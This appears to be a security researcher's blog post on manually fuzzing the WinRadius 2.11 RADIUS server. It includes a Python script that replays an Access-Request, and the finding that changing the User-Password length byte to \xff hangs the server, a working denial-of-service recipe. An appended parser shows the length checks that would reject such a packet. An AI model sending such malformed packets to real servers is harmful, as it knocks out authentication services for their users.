I set some time aside to test WinRadius yesterday. Fuzzing was done manually and using a Python script. I didn’t spend too much time on it, but I’m confident that there’s a remote code execution opportunity here. If no one else gets there first, I’ll revisit it in a few weeks.

Firstly, to ensure that our setup is good and to catch a packet, we can use ‘radclient’. I set up a user account adam/adam for testing purposes and then tried to authenticate:

Radius Client Test

radclient will form a RADIUS request from our STDIN data

Wireshark Capture

We capture the packet we sent and the response

WinRadius 2.11

And we confirm that WinRadius received and accepted the request. Once this was done, we needed to create a template within Python, and did so as follows:

#!/usr/bin/python

from socket import *
import sys
import select

pwn =  b"\x01" #Code 01 (Access-Request)
pwn += b"\xff" #packet identifier
pwn += b"\x00\x2c" #len 44
pwn += b"\xd1\x56\x8a\x38\xfb\xea\x4a\x40\xb7\x8a\xa2\x7a\x8f\x3e\xae\x23" #authenticator
pwn += b"\x01" #t=User-Name(1)
pwn += b"\x06" #avp: l=6
pwn += b"\x61\x64\x61\x6d" #adam

pwn += b"\x02" #avp t=User-Password(2)
pwn += b"\x12" #avp: l=18
pwn += b"\xf0\x13\x57\x7e\x48\x1e\x55\xaa\x7d\x29\x6d\x7a\x88\x18\x89\x21" #password (encrypted)

address = ('192.168.200.20', 1812)
server_socket = socket(AF_INET, SOCK_DGRAM)

# byte-string literals so sendto() works on Python 3 as well as Python 2
server_socket.sendto(pwn, address)

We can now replay this packet as we wish, and confirm through Wireshark and WinRadius that all is good and we are being authenticated. The next challenge was to start manually mangling data. After about 15 minutes of trial and error, I found that changing line 16 from \x12 to \xff caused the application to consume all CPU available and hang indefinitely. I couldn’t cause a crash, although with a bit more trial and error, as well as trying different RADIUS requests such as start/stop accounting, etc., I’d be surprised if there wasn’t an RCE somewhere here.

WinRadius DoS Code


WinRadius Crash

The application now hangs.
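
The length checks a RADIUS server should apply before touching any attribute value, following the RFC 2865 length rules, run against the template packet above and the same packet with the User-Password length byte set to \xff. This is an added example, not WinRadius code and not part of the original post; parse_radius and MalformedPacket are hypothetical names, and the sample bytes are rebuilt from the template.

```python
import struct

# Constructed samples, rebuilt from the template packet in the post.
HEADER = b"\x01\xff\x00\x2c" + bytes.fromhex("d1568a38fbea4a40b78aa27a8f3eae23")
USER_NAME = b"\x01\x06adam"
USER_PASSWORD = b"\x02\x12" + bytes.fromhex("f013577e481e55aa7d296d7a88188921")
GOOD = HEADER + USER_NAME + USER_PASSWORD
# Same packet with the User-Password AVP length changed from 0x12 to 0xff.
BAD = HEADER + USER_NAME + b"\x02\xff" + USER_PASSWORD[2:]


class MalformedPacket(ValueError):
    """Raised for any packet that should be dropped before processing."""


def parse_radius(data):
    """Return (code, identifier, [(type, value), ...]) or raise MalformedPacket."""
    if len(data) < 20:
        raise MalformedPacket("shorter than the 20-byte header")
    code, ident, length = struct.unpack("!BBH", data[:4])
    if not 20 <= length <= 4096:
        raise MalformedPacket("declared length %d out of range" % length)
    if length > len(data):
        raise MalformedPacket("declared length exceeds received datagram")
    attrs, pos = [], 20
    while pos < length:  # bytes past the declared length are padding
        if length - pos < 2:
            raise MalformedPacket("truncated attribute header at offset %d" % pos)
        a_type, a_len = data[pos], data[pos + 1]
        if a_len < 2:  # a length below 2 would never advance pos in this loop
            raise MalformedPacket("attribute length %d < 2 at offset %d" % (a_len, pos))
        if pos + a_len > length:  # attribute claims more bytes than the packet has
            raise MalformedPacket("attribute at offset %d overruns packet" % pos)
        attrs.append((a_type, data[pos + 2:pos + a_len]))
        pos += a_len
    return code, ident, attrs


if __name__ == "__main__":
    for name, pkt in (("template", GOOD), ("l=0xff", BAD)):
        try:
            code, ident, attrs = parse_radius(pkt)
            print(name, "accepted:", code, ident, [(t, len(v)) for t, v in attrs])
        except MalformedPacket as exc:
            print(name, "dropped:", exc)
```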